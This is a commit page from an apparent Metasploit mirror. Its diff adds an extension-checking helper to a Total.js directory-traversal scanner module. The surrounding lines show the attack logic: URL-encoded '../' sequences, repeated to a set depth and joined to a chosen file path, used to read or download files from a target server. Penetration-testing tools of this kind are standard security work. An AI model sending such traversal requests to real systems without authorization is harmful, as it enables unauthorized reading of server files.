infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add a function to check extensions

master
Fabio Cogno 2019-03-11 22:23:11 +01:00
parent bb7be797b4
commit e906ecb163
1 changed files with 18 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/auxiliary/scanner/http/totaljs_traversal.rb
View File

@ -49,6 +49,22 @@ class MetasploitModule < Msf::Auxiliary
) )
end end
def check_ext
extensions = %w[
flac jpg jpeg png gif ico js css txt xml
woff woff2 otf ttf eot svg zip rar pdf
docx xlsx doc xls html htm appcache
manifest map ogv ogg mp4 mp3 webp webm
swf package json md m4v jsx heif heic
]
ext = datastore['FILE'].split('.').last
unless extensions.include? ext
print_warning "Extension #{ext} is not supported by the HTTP static route of the framework"
end
end
def check def check
uri = normalize_uri(target_uri.path) + '%2e%2e%2fpackage.json' uri = normalize_uri(target_uri.path) + '%2e%2e%2fpackage.json'
res = send_request_cgi( res = send_request_cgi(
@ -77,6 +93,7 @@ class MetasploitModule < Msf::Auxiliary
end end
def read def read
check_ext
traverse = '%2e%2e%2f' * datastore['DEPTH'] traverse = '%2e%2e%2f' * datastore['DEPTH']
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE'] uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']
@ -98,6 +115,7 @@ class MetasploitModule < Msf::Auxiliary
end end
def download def download
check_ext
traverse = '%2e%2e%2f' * datastore['DEPTH'] traverse = '%2e%2e%2f' * datastore['DEPTH']
uri = normalize_uri(target_uri.path) + traverse + datastore['FILE'] uri = normalize_uri(target_uri.path) + traverse + datastore['FILE']